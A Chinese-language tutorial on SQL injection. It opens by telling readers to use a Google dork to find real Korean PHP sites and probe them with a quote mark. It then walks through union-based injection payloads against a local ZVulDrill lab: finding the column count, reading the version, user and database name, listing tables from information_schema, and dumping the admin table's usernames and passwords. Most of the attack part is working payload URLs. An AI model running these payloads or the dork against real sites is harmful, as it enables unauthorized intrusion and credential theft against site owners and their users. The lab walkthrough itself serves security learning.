1、找到存在sql注入的网站

方法：在google中输入 site:kr inurl:php?id= 打开出现的网址，在网址后面添加 ’ （英文逗号）如果页面出现跳转说明可能存在sql注入原理：一般网址都是类似 search.php?search=hello 相应的sql语句可能是 select * from table_name where column_name='hello' 如果在网址后面添加 ‘ 则sql语句为 select * from table_name where column_name='hello'’ 如果网站没有进行sql注入过滤，会报错在GitHub有个Web漏洞演练项目，可以下载后部署在自己的电脑上（这里我就不教大家部署了，熟悉Web编程的大部分都会） https://github.com/710leo/ZVulDrill网页内容如下

2、检测字段长度

(1) http://localhost/ZVulDrill-master/search.php?search=hello%' order by 1--%20相当于sql语句 select * from table_name where colmun_name like '%hello%' order by 1 -- '说明 MySQL有三种注释 -- 是其中一种但是 -- 后面要跟一个空格才有效但是网址会自动去掉最后一个空格需要手动输入%20注释后面的sql语句不执行(2) 此时页面没有出错，用同样的方式添加 order by 10页面出错，然后 order by 5 出错，order by 4 页面正确说明字段长 4

3、查看数据库信息

方法：使用union语句提取数据 (1) http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,2,4 --%20sql语句 select * from table_name where column_name like '%hello%' and 1=2 union select 1,2,3,4union前的sql语句中 where条件恒为假，结果集为空，整个sql语句返回的是union后面的结果集

(2) 获取MySQL version user database 等相关信息如上图所示，页面上显示 1,2 ，可以利用这个来显示我们需要的信息 http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,version(),user(),4 --%20 即将 2，3 换成 version(),user() 页面如下

同理将 user() 换成 database() 得到数据库名 zvuldrilluser() ------------ wkdty@localhostversion() -------------- 5.6.17 （5.0以上的版本都带有一个 information_schema 的虚拟库里面存放的是所有库的信息.） database() ------------- zvuldrill

4、获取数据库数据

(1)获取表名http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT table_name),4 from information_schema.columns where table_schema='zvuldrill'--%20

数据库中有3张表，对我们最有用的是admin这张表，以管理员身份进入网站可以看到各种信息(2)获取字段名http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT column_name),4 from information_schema.columns where table_name='admin'--%20

(3)获取数据http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT admin_id,admin_name,admin_pass),4 from admin--%20